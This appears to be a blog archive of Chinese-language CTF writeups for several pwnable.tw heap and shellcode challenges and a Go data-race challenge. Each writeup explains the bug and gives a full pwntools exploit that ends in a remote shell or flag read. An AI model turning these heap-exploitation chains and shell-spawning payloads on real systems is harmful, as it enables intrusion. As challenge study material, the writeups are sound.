分类 writeups 下的文章

漏洞点:

  • 虽然给了源码但是漏洞得看二进制文件才能看出,结合flag,这是C++运算符重载相关的漏洞
  • edit的时候存在栈复用,可以任意指针free

漏洞原理:

  • 正常运算符重载的写法(这里只讨论写为成员函数)需要在成员函数末尾return *this,同时返回值需要为当前对象类型的引用类型,这个返回值会作为其他运算的右值,如a = b = c,为了保证程序正常,这个值必须要存在。
  • 如果不主动写return *this,g++在编译的时候,会把返回值指针指向栈上一段同类型大小的空内存(填充为null),把这段空内存作为右值(隐式的return)然后析构这段内存。析构时遇到对象指针会先判断是否为空再执行delete
  • 但是空内存可以借助栈复用进行修改,构造出我们自定义的指针,这样在析构函数中如果有对某些指针域的delete,就可以构造出任意地址free

利用思路:

  • 难点在第一步的leak heap。通过在bss上构造fakechunk和自定义指针freebss上的chunk,然后借助一个非法size值跳过最后的析构避免doublefree,这样可以在不触发0截断时输出free过chunk上的fd值。具体细节,其实挺复杂,只可意会不可言传。
  • leak heap之后修改堆上对象内存指针指向保存了libc地址的位置,调用info成员函数leak libc
  • 最后打__malloc_hook(需要__realloc_hook间接补全栈条件)

EXP

from pwn import *

#p = process("./caov")
p = remote("chall.pwnable.tw", 10306)
elf = ELF("./caov")
libc = ELF("./libc_64.so.6")
#libc = ELF("./libc.so.6")

context.log_level = "debug"

def show():
    p.recvuntil("Your choice: ")
    p.sendline(b"1")

def edit(name, key_len:int, key, value):
    p.recvuntil("Your choice: ")
    p.sendline(b"2")
    p.recvuntil("Enter your name: ")
    p.sendline(name)
    p.recvuntil("New key length: ") 
    p.sendline(str(key_len).encode())
    if key_len > 1000:
        return
    p.recvuntil("Key: ")
    p.sendline(key)
    p.recvuntil("Value: ")
    p.sendline(str(value).encode())

def go_exit():
    p.recvuntil("Your choice: ")
    p.sendline(b"3")

def exp():
    #const
    bss_name = 0x6032C0
    fake_chunk = 0x6032a0 + 0x2 - 0x8
    one_local = [0x45226, 0x4527a, 0xf0364, 0xf1207]
    one_remote = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
    read_got = 0x602F40

    #init
    init_name = b"eqqie"
    init_key = b"\x00"*0x30
    init_value = str(0xdeadbeef).encode()
    p.recvuntil("Enter your name: ")
    p.sendline(init_name)
    p.recvuntil("Please input a key: ")
    p.sendline(init_key)
    p.recvuntil("Please input a value: ")
    p.sendline(init_value)

    #leak heap

    #gdb.attach(p, "b *0x4014c2\nb *0x4014f5\nb *0x401563\nc\n")
    #gdb.attach(p, "b *0x4014f5\nb *0x401563\nc\n")
    payload1 = p64(0)+p64(0x20)+b"DDDDDDDD"
    payload1 = payload1.ljust(0x20, b"A")
    payload1 += p64(0x20) + p64(0x20)
    payload1 = payload1.ljust(0x60, b"A")
    payload1 += p64(bss_name+0x10)
    edit(payload1, 20, b"A"*20, 0xdeadbeef)

    payload2 = p64(0)+p64(0x41)+p64(0)
    payload2 = payload2.ljust(0x40, b"A")
    payload2 += p64(0x00) + p64(0x20)
    payload2 = payload2.ljust(0x60, b"A")
    payload2 += p64(bss_name+0x10)
    edit(payload2, 1020, b"1", 0xdeadbeef)

    p.recvuntil(b"Key: ")
    p.recvuntil(b"Key: ")
    heap_leak = u64(p.recv(3).ljust(8, b"\x00"))
    heap_base = heap_leak - 0x11c90
    data_obj = heap_base + 0x11ce0 - 0x10
    heap_with_libc = heap_base + 0x11e30
    print("heap_leak:", hex(heap_leak))
    print("heap_base:", hex(heap_base))
    print("data_obj:", hex(data_obj))
    print("heap_with_libc:", hex(heap_with_libc))
    #gdb.attach(p)

    # get obj chunk && leak libc
    #gdb.attach(p, "b *0x4014f5\nb *0x401563\nc\n")
    payload3 = p64(0)
    payload3 = payload3.ljust(0x60, b"B")
    payload3 += p64(data_obj+0x10)
    edit(payload3, 0x30, p64(read_got), 0xdeadbeef)
    show()
    p.recvuntil(b"Key: ")
    libc_leak = u64(p.recvuntil(b"\x0a", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - libc.symbols[b"read"]
    one_gadget = libc_base + one_remote[1]
    malloc_hook = libc_base + libc.symbols[b"__malloc_hook"]
    fake_chunk = malloc_hook - 0x23
    realloc = libc_base + libc.symbols[b"realloc"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("one_gadget:", hex(one_gadget))
    print("malloc_hook:", hex(malloc_hook))
    print("fake_chunk:", hex(fake_chunk))

    # get malloc_hook
    ## fakebin akkack
    payload4 = p64(0) + p64(0x71)
    payload4 = payload4.ljust(0x60, b"A")
    payload4 += p64(bss_name+0x10)
    payload4 = payload4.ljust(0x70, b"A")
    payload4 += p64(0x70) + p64(0x21)
    edit(payload4, 1020, b"1", 0xdeadbeef)

    ## fake fd
    payload5 = p64(0) + p64(0x71)
    payload5 += p64(fake_chunk)
    edit(payload5, 1020, b"1", 0xdeadbeef)

    ## get fake chunk
    edit(p64(0) + b"\x71", 0x60, b"1", 0xdeadbeef)
    #gdb.attach(p, "b *0x4014f5\nb *0x401563\nc\n")
    edit(b"eqqie", 0x60, b"a"*(0x13-0x8) + p64(one_gadget) + p64(realloc), 0xdeadbeef)

    p.sendline("cat /home/*/flag")
    p.interactive()


if __name__ == "__main__":
    exp()

漏洞利用

程序Heap内存区域有执行权限,并且Add功能存在下标溢出。当使用负数下标时可以覆盖got表项指针指向堆内存,从而执行自定义shellcode。但是堆块输入限制非常大,只有8个字节,而且要求全为大小写字母或数字。也就是说需要用多个堆块借助拼接构造shellcode。

为了简化利用,先构造调用SYS_read的shellcoed,然后借助它往堆上读执行execve("/bin/sh", NULL, NULL)的系统调用来getshell。

主要难点

  1. 构造为全为大小写字母或数字的shellcode,这个思路网上很多,主要都是利用push, pop, xor, dec, jne之类的指令进行构造(注意xor的时候一般使用al寄存器)

  2. 使用jne指令连接多个块,jne的操作数是相对值,即目标指令相对于下一条指令的偏移,所以要考虑好两段shellcode中间间隔堆块的数量以便操作数在合法范围内。

  3. 通过减法+异或构造出int 0x80指令(技巧性很强)。

EXP

from pwn import *

#p = process("./alive_note")
p = remote("chall.pwnable.tw", 10300)
elf = ELF("./alive_note")
context.log_level = "debug"
context.arch = "i386"

free_offset = -27

#free reg info
'''
 EAX  0x804b018 ◂— 'bbbb' (free arg)
 EBX  0x0
 ECX  0x0
 EDX  0x0
 EDI  0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x2d /* 0x1b2db0 */
 ESI  0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x2d /* 0x1b2db0 */
 EBP  0xffffcee8 —▸ 0xffffcef8 ◂— 0x0
 ESP  0xffffcebc —▸ 0x80488ef (del_note+81) ◂— add    esp, 0x10
 EIP  0x804b008 ◂— 'aaaa' (code)
'''

def get_alpha_shellcode(raw):
    with open("./alpha3/raw.in", "wb") as r:
        r.write(asm(raw))
    os.system('cd alpha3;python ALPHA3.py x86 ascii rax --input="raw.in" > alpha.out')
    res = b""
    with open("./alpha3/alpha.out", "rb") as a:
        res = a.read()
    return res

def add(idx:int, name):
    p.recvuntil(b"Your choice :")
    p.sendline(b"1")
    p.recvuntil(b"Index :")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Name :")
    p.sendline(name)

def show(idx:int):
    p.recvuntil(b"Your choice :")
    p.sendline(b"2")
    p.recvuntil(b"Index :")
    p.sendline(str(idx).encode())

def delete(idx:int):
    p.recvuntil(b"Your choice :")
    p.sendline(b"3")
    p.recvuntil(b"Index :")
    p.sendline(str(idx).encode())

def chunk_pad(num):
    for i in range(num):
        add(10, b"aaaaaaa")

def exp():
    #build shellcode
    ## call SYS_read to read execve shellcode

    ### PYjzZu9
    part1 = '''
    push eax
    pop ecx
    push 0x7a
    pop edx
    '''
    part1 = asm(part1) + b"\x75\x39"
    add(-27, part1)
    chunk_pad(3)

    ### SXH0AAu8
    part2 = '''
    push ebx
    pop eax
    dec eax
    xor BYTE PTR [ecx+0x41], al
    '''
    part2 = asm(part2) + b"\x75\x38"
    add(0, part2)
    chunk_pad(3)

    ### 490ABSu8
    part3 = '''
    xor al, 0x39
    xor BYTE PTR [ecx+0x42], al
    push ebx
    '''
    part3 = asm(part3) + b"\x75\x38"
    add(0, part3)
    chunk_pad(3)

    ### Xj3X40u9
    part4 = '''
    pop eax
    push 0x33
    pop eax
    xor al, 0x30
    '''
    part4 = asm(part4) + b"\x75\x39"
    add(1, part4)
    chunk_pad(3)

    ### 02F
    part5 = b"\x30\x32\x46"
    add(2, part5)

    #gdb.attach(p, "b *0x804b008\nb *0x804b10b\nc\n")
    delete(1)

    ## write shellcode to run next
    shellcode = asm(shellcraft.sh())
    payload = b"a"*0x43 + shellcode
    p.sendline(payload)

    # getshell
    p.interactive()

if __name__ == "__main__":
    exp()

思路:

  1. Autor未设置截断导致heap泄露,strlen重设长度时包含下一个chunk的size导致溢出;
  2. 进行house of orange释放原先的topchunk进入unsortedbin(进入过程可以借助scanf中malloc分配缓冲区来完成),以此可以泄露libc;
  3. (关键)unsortedbin attack攻击IO_list_all,使其的指针指向main_arena+0x58,然后以此为IO_FILE结构体,再通过struct _IO_FILE *_chain域指向堆上的unsortedbin位置;
  4. 只要提前在unsortedbin位置伪造好IO_FILE结构体和vtable就可以借助_IO_flush_all_lockp(在触发malloc_printerr时会被调用)调用system("/bin/sh\x00")来getshell.

分析历程

这里有个很操蛋的地方卡了很久...开始一直弄不明白unsortedbin attack修改掉IO_list_all之后如何构造struct _IO_FILE *_chain指向堆上我们伪造的结构。分析发现如果把main_arena+0x58看作结构体,则对应smallbin[4](0x60)的索引位置,也就是只要有一个0x60的smallbin被free就可以构成链表。

但是想了很久还是不明白如何让unsortedbin进入这个位置...又翻了好久的源代码发现在尝试对unsortedbin进行分割前,其中一个判断条件要满足的是:bck == unsorted_chunks (av),而bck = victim->bk 。换句话说,只要unsorted chunk中的bk指针被修改掉之后,一定不会满足这个判断,也就一定不会进入分割unsorted chunk的过程。如果我们提前借助堆溢出修改unsorted chunk大小为0x61,则在下次分配一个0x10的堆块时就会进入下面把unsorted chunk置入smallbin的分支过程,这一举动刚好使得smallbin[4](0x60)的索引位置出现了原先unsorted chunk的指针。加上一定的构造之后(相关限制条件可以看ctfwiki)就可以通过触发报错拿shell了。

总结一下就是:在bk指针被破坏之后,原本可能发生的unsorted chunk分割条件无法满足,而是直接把整个unsorted chunk置入smallbin对应位置(注意不是fastbin,不能只看大小,要看程序流)。这些细节勿略掉可能会在很浅显的地方翻车。

EXP:

from pwn import *

#p = process("./bookwriter", env = {"LD_PRELOAD":"./libc.so.6"})
p = remote("chall.pwnable.tw", 10304)
elf = ELF("./bookwriter")
libc = ELF("./libc_64.so.6")
context.log_level = "debug"

def send_choice(idx:int):
    p.recvuntil(b"Your choice :")
    p.sendline(str(idx).encode())

def add(size, content):
    send_choice(1)
    p.recvuntil(b"Size of page :")
    p.sendline(str(size).encode())
    p.recvuntil(b"Content :")
    p.send(content)

def view(idx:int):
    send_choice(2)
    p.recvuntil(b"Index of page :")
    p.sendline(str(idx).encode())

def edit(idx:int, content):
    send_choice(3)
    p.recvuntil(b"Index of page :")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Content:")
    p.send(content)

def info(new_author=None):
    send_choice(4)
    p.recvuntil(b"(yes:1 / no:0)")
    if new_author != None:
        p.sendline(b"1")
        p.recvuntil(b"Author :")
        p.send(new_author)
    else:
        p.sendline(b"0")

def go_exit():
    send_choice(5)

def exp():
    # const
    bss_author = 0x602060
    bss_catalog = 0x6020a0
    bss_sizelist = 0x6020e0

    # set author
    author = b"a"*(0x40-0x2) + b"||"
    p.recvuntil(b"Author :")
    p.send(author)

    # leak libc && heap
    add(0x18, b"aaa") #0

    ## leak libc
    edit(0, b"a"*0x18)
    edit(0, b"a"*0x18+b"\xe1\x0f\x00") #modify size of top_chunk
    info() # call printf to malloc(0x1000) && get unsortedbin
    add(0x78, b"aaaaaaaa") #1
    view(1) #leak address preserved

    p.recvuntil(b"Content :\naaaaaaaa")
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 0x3c4188
    system = libc_base + libc.symbols[b"system"]
    stdout = libc_base + 0x3c5620
    io_list_all = libc_base + libc.symbols[b"_IO_list_all"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("stdout:", hex(stdout))
    print("io_list_all:", hex(io_list_all))

    ## leak heap
    send_choice(4) #info
    p.recvuntil(b"||")
    heap_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    heap_base = heap_leak - 0x10
    print("heap_leak:", hex(heap_leak))
    print("heap_base:", hex(heap_base))
    p.sendafter(b"(yes:1 / no:0)", b"0\n")

    chunk1_addr = heap_base + 0x20 
    print("chunk1_addr:", hex(chunk1_addr))

    edit(0, b"\n") #set size[0]=0
    for i in range(7):
        add(0x58, b"bbbb")

    ## unsortedbin attack
    pad = b"a"*0x330
    ## build fake _IO_FILE and vtable
    data = b'/bin/sh\x00'
    data += p64(0x61)
    data += p64(0xdeadbeef)
    data += p64(libc_base + libc.symbols[b'_IO_list_all'] - 0x10)
    data += p64(2)
    data += p64(3)
    data = data.ljust(0xc0, b'\x00')
    data + p64(0xffffffffffffffff)
    data = data.ljust(0xe0-8, b'\x00')
    vtable = p64(0) * 3 + p64(libc_base + libc.symbols[b'system'])
    vtable_addr = heap_base + 0x420
    data += p64(vtable_addr)
    data += vtable
    edit(0, pad+data)
    edit(0, b"\n") #set size[0]=0

    send_choice(1)
    p.recvuntil(b"Size of page :")
    p.sendline(b"16")

    #gdb.attach(p)

    p.interactive()

if __name__ == "__main__":
    exp()

一道google题

golang相关

一些特性

  • golang默认是静态编译,而且系统ASLR不作用在goroutine自己实现和维护的栈上。从这题上看,main调用了hack,所以对hack的改动不会影响main中数据在栈上的偏移。只要先在本地计算出hack第一个变量和flag之间的偏移,就可以计算出远程环境中flag在栈上的位置。
  • goroutine的模型大概如下(知乎看到的):

    • goroutine与系统线程模型
    • M是系统线程,P是上下文,G是一个goroutine。具体实现请移步:https://www.zhihu.com/question/20862617
    • 创建goroutine很容易,只需要go function_name()即可
  • 题目不允许import包,但是builtin包中有println可以用来打印信息(打印变量地址或值)

go中的数据结构

实现本题要用到的数据结构不多,只介绍go中常用于data race的数据结构

更详细的资料请移步文档:https://studygolang.com/pkgdoc

Struct

基本定义如下:

type struct_name struct {
    name type
}

Go 语言中没有类的概念,因此在 Go 中结构体有着更为重要的地位。结构体是复合类型(composite types),当需要定义一个类型,它由一系列属性组成,每个属性都有自己的类型和值的时候,就应该使用结构体,它把数据聚集在一起。

Interface

interface是一组method的集合,是duck-type programming的一种体现。接口做的事情就像是定义一个协议(规则),只要一台机器有洗衣服和甩干的功能,我就称它为洗衣机。不关心属性(数据),只关心行为(方法)。

接口(interface)也是一种类型。

一个对象只要全部实现了接口中的方法,那么就实现了这个接口。换句话说,接口就是一个需要实现的方法列表。

例子:

// Sayer 接口
type Sayer interface {
    say()
}

type dog struct {}

type cat struct {}

// dog实现了Sayer接口
func (d dog) say() {
    fmt.Println("汪汪汪")
}

// cat实现了Sayer接口
func (c cat) say() {
    fmt.Println("喵喵喵")
}

func main() {
    var x Sayer // 声明一个Sayer类型的变量x
    a := cat{}  // 实例化一个cat
    b := dog{}  // 实例化一个dog
    x = a       // 可以把cat实例直接赋值给x
    x.say()     // 喵喵喵
    x = b       // 可以把dog实例直接赋值给x
    x.say()     // 汪汪汪
}

可以看到,实现了接口方法的结构体变量可以赋值给接口变量,然后可以用该接口来调用被实现的方法。

值接收者和指针接收者实现接口的区别(这里不是很清楚,建议自己查):

当值接收者实现接口:

func (d dog) move() {
    fmt.Println("狗会动")
}
func main() {
    var x Mover
    var wangcai = dog{} // 旺财是dog类型
    x = wangcai         // x可以接收dog类型
    var fugui = &dog{}  // 富贵是*dog类型
    x = fugui           // x可以接收*dog类型
    x.move()
}

可以发现:使用值接收者实现接口之后,不管是dog结构体还是结构体指针*dog类型的变量都可以赋值给该接口变量。因为Go语言中有对指针类型变量求值的语法糖,dog指针fugui内部会自动求值*fugui

注意

当指针接收者实现接口:

func (d *dog) move() {
    fmt.Println("狗会动")
}
func main() {
    var x Mover
    var wangcai = dog{} // 旺财是dog类型
    x = wangcai         // x不可以接收dog类型
    var fugui = &dog{}  // 富贵是*dog类型
    x = fugui           // x可以接收*dog类型
}

此时实现Mover接口的是*dog类型,所以不能给x传入dog类型的wangcai,此时x只能存储*dog类型的值。

Slice

切片是数组的一个引用,因此切片是引用类型。但自身是结构体,值拷贝传递。

切片的底层数据结构:

type slice struct {  
    array unsafe.Pointer
    len   int
    cap   int
}

array是被引用的数组的指针,len是引用长度,cap是最大长度(也就是数组的长度)

Data race

比赛结束的时候查到这篇博客:http://wiki.m4p1e.com/article/getById/90

以及它的引用(讲得比较好,建议看这个):https://blog.stalkr.net/2015/04/golang-data-races-to-break-memory-safety.html

这两篇博客解释了data race的原理

interface既然可以接收不同的实现了接口方法的接口题变量,那么它一定是一种更为抽象的数据结构,我将其粗略描述为如下:

type Interface struct{
    type **uintptr
    data **uintptr
}

所以在给接口变量传值的过程中实际上发生了两次数据转移操作,一次转移到type,一次转移到data。而这个转移操作并不是原子的。意味着,如果在一个goroutine中频繁对接口变量交替传值,在另一个goroutine中调用该接口的方法,就可能出现下面的情况:

  • (正常)type和data正好都是A或B struct的type和data
  • (异常)type和data分别是A和B struct的type和data,如下:
{
    type --> B type
    data --> A date --> value f
}

而调用接口时是通过判断type来确定方法的具体实现,这就出现了调用B实现的方法来操作A中数据的错误情况。

看博客中的例子就明白了:

package main

import (
    "fmt"
    "os"
    "runtime"
    "strconv"
)

func address(i interface{}) int {
    addr, err := strconv.ParseUint(fmt.Sprintf("%p", i), 0, 0)
    if err != nil {
        panic(err)
    }
    return int(addr)
}

type itf interface {
    X()
}

type safe struct {
    f *int
}

func (s safe) X() {}

type unsafe struct {
    f func()
}

func (u unsafe) X() {
    if u.f != nil {
        u.f()
    }
}

func win() {
    fmt.Println("win", i, j)
    os.Exit(1)
}

var i, j int

func main() {
    if runtime.NumCPU() < 2 {
        fmt.Println("need >= 2 CPUs")
        os.Exit(1)
    }
    var confused, good, bad itf
    pp := address(win)
    good = &safe{f: &pp}
    bad = &unsafe{}
    confused = good
    go func() {
        for {
            confused = bad
            func() {
                if i >= 0 { 
                    return
                }
                fmt.Println(confused)
            }()
            confused = good
            i++
        }
    }()
    for {
        confused.X()
        j++
    }
}

这里暂且不管作者实现的address这个小trick

在main中启动了一个goroutine,其中不断交叉对confused传值,其中badunsafe类型,goodsafe类型。当条件竞争发生,confusedtype指向bad,而data还是good。当原来的routine调用confused中的X方法时就会把good中的*int值当作函数指针来调用。如果控制这个值为我们想要的函数的地址如win,就可以实现程序流劫持。

赛题

题目分析

回到题目本身:

package main

func main() {
        flag := []int64{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}
        for i, v := range flag {
                flag[i] = v + 1
        }
        hack()
}

func hack() {
    /*code*/
}

地址泄露过程:
- 本地构造好EXP框架后,打印出flag首元素地址
- 去掉main中的println语句,然后打印hack中栈变量的地址
- 计算两地址差值作为偏移
- 打印出远程环境中hack栈变量的地址
- 用之前的偏移计算出flag首元素的地址
- 注意:
-- go版本一定要和远程对上
-- 虽然main中的println不影响flag的地址,但是会影响hack中栈变量的地址
-- 实测发现如果不把EXP框架构造好直接打印hack栈变量的地址计算出的偏移是不对的,也许编译期间有一些我不知道的机制在里面。

不做过多演示

接下来问题的关键在于泄露一个已知地址上的值应如何实现。

而golang在不使用unsafe包时不允许把已知的整数值地址,转换为指针进行读写操作。于是需要用条件竞争,来绕过这个限制,从而泄露出我们自定义地址保存的的值。

EXP:

from pwn import *
import time

code_base = '''
func hack(){
    println("exp start...")
    a := "123"
    println(&a) 
    var confused, good, bad itf
    pp := 0xc82003ddc0 - 0x8200117d8 + 0x8*{{offset}} 
    good = &safe{f: pp}
    bad = &unsafe{}
    confused = good    
    go func() {
        for {
            confused = bad
            func() {
                if i >= 0 {
                    return
                }
                println(confused)
            }()
            confused = good
            i++
        }
    }()
    for {
        confused.X()
        j++
    }
    println("exp stop...")
}

var i, j int

type safe struct {
    f int
}

type unsafe struct {
    f *int
}

type itf interface {
    X()
}

func (s safe) X() {}

func (u unsafe) X() {
    if u.f != nil {
        println("AAAA")
        println(*u.f)
    }
}
#'''

flag = ""

for i in range(45):
    p = remote("123.56.96.75", 30775)
    #context.log_level = "debug"
    p.recvuntil(b"[*] Now give me your code: \n")
    print(str())
    code = code_base.replace('{{offset}}', str(i))
    p.sendline(code)
    p.recvuntil(b"AAAA\n")
    chr_int = int(p.recvuntil(b"\n", drop=True), 10)
    flag += chr(chr_int - 1)
    p.close()
    print(flag)

print("flag:", flag)

单独看其中code_base部分

func hack(){
    println("exp start...")
    a := "123"
    println(&a) //用于地址泄露
    var confused, good, bad itf
    pp := 0xc82003ddc0 - 0x8200117d8 + 0x8*{{offset}} //远程环境下flag每一个元素的地址
    good = &safe{f: pp}
    bad = &unsafe{}
    confused = good    
    go func() {
        for {
            confused = bad
            func() {
                if i >= 0 {
                    return
                }
                println(confused)
            }()
            confused = good
            i++
        }
    }()
    for {
        confused.X()
        j++
    }
    println("exp stop...")
}

var i, j int

type safe struct {
    f int
}

type unsafe struct {
    f *int
}

type itf interface {
    X()
}

func (s safe) X() {}

func (u unsafe) X() {
    if u.f != nil {
        println("AAAA")
        println(*u.f)
    }
}

其中safe结构中有int类型的f,而unsafe结构中有*int类型的f。并且unsafe实现了接口itfX方法,该方法输出f *int指针保存的值。在条件竞争时,如果confused中type为unsafe,而data为bad中的数据(创建bad的时候f被赋值为flag元素的地址),这时调用confusedX方法就会打印出flag元素地址中的值了。

最后python统一接收处理得出flag。

之所以记录这题是因为一开始我忽略了两个很朴素的方法组合在一起所造成的地址泄露技巧——bss任意写+0x20字节输出+伪造堆块。被常规思维束缚(平时比赛的恰饭题千篇一律也是一个原因)的我老想着找办法去打stdout,然而对于free次数的限制根本不允许我这么做。于是转念一想,既然不能泄露有libc地址的地方,我可以通过伪造大堆块并释放,让地址出现在bss上我可以输出的部分。

题目分析

思路

EXP

from pwn import *

#p = process("./tcache_tear")
p = remote("chall.pwnable.tw", 10207)
elf = ELF("./tcache_tear")
libc = ELF("./libc-remote.so")
context.log_level = "debug"

def malloc(size:int, content):
    p.recvuntil(b"Your choice :")
    p.sendline(b"1")
    p.recvuntil(b"Size:")
    p.sendline(str(size).encode())
    p.recvuntil(b"Data:")
    p.send(content)

def free():
    p.recvuntil(b"Your choice :")
    p.sendline(b"2")

def info():
    p.recvuntil(b"Your choice :")
    p.sendline(b"3")

def exp():
    #const
    printf_plt = elf.symbols[b"printf"]
    atoll_got = elf.got[b"atoll"]
    bss_name = 0x602060
    bss_chunk_ptr = 0x602088
    print("printf_plt:", hex(printf_plt))
    print("atoll_got:", hex(atoll_got))
    print("bss_name:", hex(bss_chunk_ptr))
    print("bss_chunk_ptr:", hex(bss_chunk_ptr))

    name = p64(0) + p64(0x511)
    p.recvuntil(b"Name:")
    p.send(name)

    # leak lib
    ## tcache attach 1
    malloc(0x68, b"aaaa")
    for i in range(2):
        free()
    malloc(0x68, p64(bss_name+0x510))
    malloc(0x68, b"bbbb")

    ## make fake_fastchunk for fake_largechunk
    print("fake_fastchunk*2:", hex(bss_name+0x510))
    payload = p64(0) + p64(0x21) + p64(0)*3 + p64(0x21)
    malloc(0x68, payload)

    ## tcache attack 2
    malloc(0x78, b"cccc")
    for i in range(2):
        free()
    malloc(0x78, p64(bss_name+0x10))
    malloc(0x78, b"dddd")

    ## build fake_largechunk
    print("fake_fastchunk*2:", hex(bss_name+0x10))
    payload = p64(0) + p64(0)
    malloc(0x78, payload) #get fake_largechunk_ptr
    ## get libc addr
    free()

    ## leak info
    info()
    p.recvuntil(b"Name :")
    p.recv(0x10)
    libc_leak = u64(p.recv(8))
    libc_base = libc_leak - 0x3ebca0
    system = libc_base + libc.symbols[b"system"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("system:", hex(system))
    print("free_hook:", hex(free_hook))

    malloc(0x58, b"e"*8)
    for i in range(2):
        free()
    malloc(0x58, p64(free_hook))
    malloc(0x58, b"ffff")
    malloc(0x58, p64(system))
    gdb.attach(p)

    malloc(0x18, b"/bin/sh\x00")
    free()

    p.interactive()

if __name__ == "__main__":
    exp()